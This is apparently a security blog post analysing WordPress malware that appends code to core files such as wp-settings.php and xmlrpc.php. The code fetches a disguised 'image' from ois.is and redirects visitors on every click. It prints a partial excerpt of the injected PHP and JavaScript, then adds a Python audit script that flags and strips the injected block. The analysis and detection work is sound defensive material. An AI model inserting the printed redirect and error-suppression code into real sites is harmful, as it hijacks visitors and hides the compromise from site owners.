Here we introduce a type of malware that has been spreading rapidly in recent years: it fetches a file from ois.is that is disguised as an image and embeds the resulting code in WordPress sites.


Malware that loads malicious code disguised as an image from ois.is and executes it on WordPress sites

This malware exploits a vulnerability to hijack WordPress administrator privileges and then embeds malicious code in key WordPress files.

Because the infection takes the form of code appended to WordPress core files, remediation must remove only the injected portion: deleting the files themselves will break the site. Before editing, take a backup and confirm which files actually differ from the official release (for example with wp-cli's `wp core verify-checksums`), so that nothing untouched is edited by mistake.

↓The most commonly tampered-with files are as follows
wp-settings.php
wp-comments-post.php
xmlrpc.php
wp-trackback.php
wp-blog-header.php
wp-signup.php
wp-cron.php
wp-links-opml.php

Malware Code

Let's take a look at the malware code. The injected portion is shown below; the parts marked "(omitted)" were left out of the original write-up and are not reproduced here.

// PHP: switch off all error reporting, logging and display
error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('display_errors', 0);

// PHP: iterate over the visitor's cookies (part 1)
$ckUjYggTf = 0;
foreach($_COOKIE as $vUjUnHvOOoO => $vvvUjUnHvOOoO){
   1(omitted)
   break;
}
}
}
// JavaScript emitted by the PHP above from inside a double-quoted string (hence the \" escapes)
function globalClick(event) {
  const host = location.host
  const newLocation = \"https://ois.is/images/logo.png\"
  2(omitted)
  // only redirect again once allowedHours have passed since the stored timestamp
  const hoursDiff = getHoursDiff(nowDate, storageDate)
  console.log(nowDate, storageDate, hoursDiff)
  if (hoursDiff >= allowedHours) {
    addToStorage(host, nowDate);
    window.open(newLocation, \"_blank\");
  }
  3(omitted)
  window.open(newLocation, \"_blank\"); }
}
}
// hook every click on the page (part 3)
document.addEventListener(\"clickClick", globalClick); }
})();"; }
}

The error_reporting and ini_set lines at the top switch off every error report, log entry and on-screen warning, so that a fault in the injected code leaves no trace in the PHP error log or on the page.

In part 1, the malware records a timestamp (the original analysis places it in the visitor's cookie; the JavaScript half does the same client-side through addToStorage and compares it against allowedHours) so that the redirect fires only occasionally. A visitor who is redirected once and then browses normally is unlikely to report it, which delays discovery of the infection.

In part 2, the malware's real payload is fetched from the external server ois.is, disguised as an image: the URL ends in logo.png, but what is served is code, not an image. It includes a list of malicious URLs used for a so-called redirect hack, which forces visitors of the infected site to a different site.

In part 3, the fetched code is executed and a click handler is registered on the whole document, so the redirect hack fires (window.open in a new tab) whenever the visitor clicks anything on the site, not only a particular link.
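The following script is an added example, not the page's own code and not the plugin mentioned below. It applies the remediation rule stated above (remove only the injected block, never the whole file) to the core files the page lists: each file is first compared by SHA-256 against a known-good value, and a file that differs is then searched for the indicators visible in the code sample (the error-suppression prelude, the loop over $_COOKIE, the ois.is "image" URL and the click hook) to locate the block to cut out. The known-good hashes, the stand-in file contents and the exact end marker of the injected block are assumptions made for the example; on a real site the hashes come from the matching WordPress release (wp-cli's `wp core verify-checksums` does that comparison online).

```python
# Added example: audit the WordPress core files the page lists and locate the
# injected block so that only it is removed. Not the page's or the plugin's code.
import hashlib
import re

# Files the page lists as most commonly tampered with.
TARGET_FILES = [
    "wp-settings.php", "wp-comments-post.php", "xmlrpc.php", "wp-trackback.php",
    "wp-blog-header.php", "wp-signup.php", "wp-cron.php", "wp-links-opml.php",
]

# Indicators taken from the code sample on this page.
START_MARKER = re.compile(r"^\s*error_reporting\(0\);\s*$")
INDICATORS = [
    re.compile(r"@ini_set\('(?:error_log|log_errors|display_errors)'"),
    re.compile(r"foreach\s*\(\s*\$_COOKIE\s+as\s+\$\w+\s*=>\s*\$\w+\s*\)"),
    re.compile(r"https://ois\.is/images/"),
    re.compile(r"addEventListener\(\\?\"click"),
]
# ASSUMPTION: the injected block ends at the line that closes the echoed
# JavaScript string, as in the sample on this page ('})();"; }').
END_MARKER = re.compile(r'\}\)\(\);(?:</script>)?\\?";\s*\}')


def sha256_text(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def find_injection(text: str):
    """Return (start, end, hits) as 1-based inclusive line numbers, or None if
    no indicator is present. Without a start/end marker the first/last
    indicator line is used, so a variant without the prelude is still found."""
    start = end = None
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if start is None and START_MARKER.match(line):
            start = lineno
        if any(p.search(line) for p in INDICATORS):
            hits.append(lineno)
        if start is not None and END_MARKER.search(line):
            end = lineno
            break
    if not hits:
        return None
    return (start if start is not None else hits[0],
            end if end is not None else hits[-1], hits)


def strip_injection(text: str) -> str:
    """Return the file with only the injected block removed."""
    found = find_injection(text)
    if found is None:
        return text
    start, end, _ = found
    lines = text.splitlines(keepends=True)
    return "".join(lines[:start - 1] + lines[end:])


def audit(files: dict, known_good: dict) -> dict:
    """files: {name: content}; known_good: {name: sha256 of the pristine file}.
    A checksum mismatch with no indicator is reported as "modified" so that a
    variant the indicators do not cover is still reviewed by hand."""
    report = {}
    for name in TARGET_FILES:
        if name not in files:
            continue
        if known_good.get(name) == sha256_text(files[name]):
            report[name] = {"status": "clean"}
            continue
        found = find_injection(files[name])
        if found is None:
            report[name] = {"status": "modified"}
        else:
            report[name] = {"status": "infected", "block": found[:2], "hits": found[2]}
    return report


# Constructed stand-ins (not real WordPress source) so the audit runs offline.
PRISTINE = {
    "wp-cron.php": "<?php\n/* constructed stand-in */\nrequire_once __DIR__ . '/wp-load.php';\n",
    "wp-settings.php": "<?php\n/* constructed stand-in */\n$wp_version = 'x';\n",
    "xmlrpc.php": "<?php\n/* constructed stand-in */\nrequire_once __DIR__ . '/wp-load.php';\n",
}
KNOWN_GOOD = {name: sha256_text(content) for name, content in PRISTINE.items()}

# Injected block modelled on the sample above; the omitted parts are not reconstructed.
INJECTED_BLOCK = (
    "error_reporting(0);\n"
    "@ini_set('error_log', NULL);\n"
    "@ini_set('log_errors', 0);\n"
    "@ini_set('display_errors', 0);\n"
    "$ckUjYggTf = 0;\n"
    "foreach($_COOKIE as $vUjUnHvOOoO => $vvvUjUnHvOOoO){ break; }\n"
    "if ($ckUjYggTf === 0) { echo \"<script>(function(){\n"
    "const newLocation = \\\"https://ois.is/images/logo.png\\\";\n"
    "document.addEventListener(\\\"click\\\", function(){ window.open(newLocation, \\\"_blank\\\"); });\n"
    "})();</script>\"; }\n"
)
SAMPLE_SITE = {
    "wp-cron.php": "<?php\n" + INJECTED_BLOCK + PRISTINE["wp-cron.php"][len("<?php\n"):],
    "wp-settings.php": PRISTINE["wp-settings.php"],
    "xmlrpc.php": PRISTINE["xmlrpc.php"] + "// harmless local edit\n",
}

if __name__ == "__main__":
    for name, result in audit(SAMPLE_SITE, KNOWN_GOOD).items():
        print(name, result)
```

With the constructed site, wp-settings.php is reported clean, wp-cron.php is reported infected with the block at lines 2 to 11 (and strip_injection returns the pristine file), and xmlrpc.php is reported only as modified because its checksum differs but none of the indicators match; that last case is the one to inspect by hand, since a reworked variant of the malware would look the same to this script.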

This malware can be detected and removed with the following plugin. Please try it.
[Free] WordPress: Malware Scan & Security Plugin [Malware and Virus Detection and Removal]